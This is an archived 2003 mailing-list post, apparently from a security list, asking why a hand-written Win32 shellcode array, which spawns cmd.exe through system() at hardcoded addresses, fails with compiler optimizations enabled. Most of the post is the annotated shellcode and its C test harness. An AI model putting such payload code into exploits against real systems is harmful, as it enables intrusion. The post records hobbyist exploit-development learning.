shellcode not executing if optimizations are on.

From: wirepair (wirepairat_private)
Date: Wed Apr 30 2003 - 08:46:20 PDT

Next message: Cesar: "Latest MS SQL Server vulnerabilities revealed."

Previous message: aT4r InsaN3: "Buffer overflow in Microsoft ftp.exe"
Next in thread: Luciano Miguel Ferreira Rocha: "Re: shellcode not executing if optimizations are on."
Reply: Luciano Miguel Ferreira Rocha: "Re: shellcode not executing if optimizations are on."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ok so I'm still trying my hand at writing shellcode for 
win32.
My problem is my code executes fine as long as i compile 
with out optimizations, If i disable optimizations it 
executes fine and i get my cmd.exe shell. Could anyone 
throw me a fricken bone and tell me what I'm doing wrong? 
You can find my inline asm at (which this is based off 
of): http://sh0dan.org/files/llacmd.txt.
But if you're lazy like I am you'll probably just want to 
see this:

#include <stdio.h>

int main(int argc, char **argv) {
	char shellcizode[] = 
	"\x55"				// push ebp
	"\x8b\xec"			// mov ebp, esp
	"\x53"				// push ebx
	"\x56"				// push esi
	"\x57"				// push edi
	"\x8b\xe5"			// mov esp, ebp				
	"\x55"				// push ebp
	"\x8b\xec"			// mov ebp, esp
	"\x33\xff"			// xor edi,edi
	"\x57"				// push edi
	"\x57"				// push edi
	"\xc6\x45\xf8\x6d"		// mov byte ptr ss:[ebp-8],6d
	"\xc6\x45\xf9\x73"		// mov byte ptr ss:[ebp-7],73
	"\xc6\x45\xfa\x76"		// mov byte ptr ss:[ebp-6],76
	"\xc6\x45\xfb\x63"		// mov byte ptr ss:[ebp-5],63
	"\xc6\x45\xfc\x72"		// mov byte ptr ss:[ebp-4],72
	"\xc6\x45\xfd\x74"		// mov byte ptr ss:[ebp-3],74
	"\xb8\xe8\xfe\xe9\x77" 		// mov 
eax,kernel32.loadlibraryA; 
	"\x50"				// push eax
	"\x8d\x45\xf8"			// lea eax, dword ptr ss:[ebp-8]
	"\x50"				// push eax
	"\xff\x55\xf4"			// call dword ptr ss:[ebp-c]
	"\x58"				// pop eax
	"\x58"				// pop eax
	"\x58"				// pop eax
	"\x33\xc0"			// xor eax,eax
	"\x50"				// push eax
	"\x50"				// push eax
	"\xc6\x45\xf8\x63"		// mov byte ptr ss:[ebp-8],63
	"\xc6\x45\xf9\x6d"		// mov byte ptr ss:[ebp-7],6d
	"\xc6\x45\xfa\x64"		// mov byte ptr ss:[ebp-6],64
	"\xc6\x45\xfb\x2e"		// mov byte ptr ss:[ebp-5],2e
	"\xc6\x45\xfc\x65"		// mov byte ptr ss:[ebp-4],65
	"\xc6\x45\xfd\x78"		// mov byte ptr ss:[ebp-3],78
	"\xc6\x45\xfe\x65"		// mov byte ptr ss:[ebp-2],65
	"\xb8\xc3\xaf\x01\x78"		// mov eax, 7801AFC3; addy of 
system() from msvcrt
	"\x50"				// push eax
	"\x8d\x45\xf8"			// lea eax, dword ptr ss:[ebp-8]
	"\x50"				// push eax
	"\xff\x55\xf4"			// call dword ptr ss:[ebp-c]
	"\x83\xc4\x04"			// add esp, 04h
	"\x5c"				// pop esp
	"\xc3";				// ret			we're done!
	((void (*)(void))&shellcizode)();

	return(0);
}
I'm sure the formatting got totally screwed but basically 
i'm calling loadlibrary a with msvcrt to be able to use 
the address of system() to execute cmd.exe. Now this only 
works IF optimizations are disabled. any hints??
Thanks,
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>

Next message: Cesar: "Latest MS SQL Server vulnerabilities revealed."
Previous message: aT4r InsaN3: "Buffer overflow in Microsoft ftp.exe"
Next in thread: Luciano Miguel Ferreira Rocha: "Re: shellcode not executing if optimizations are on."
Reply: Luciano Miguel Ferreira Rocha: "Re: shellcode not executing if optimizations are on."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 30 2003 - 09:09:33 PDT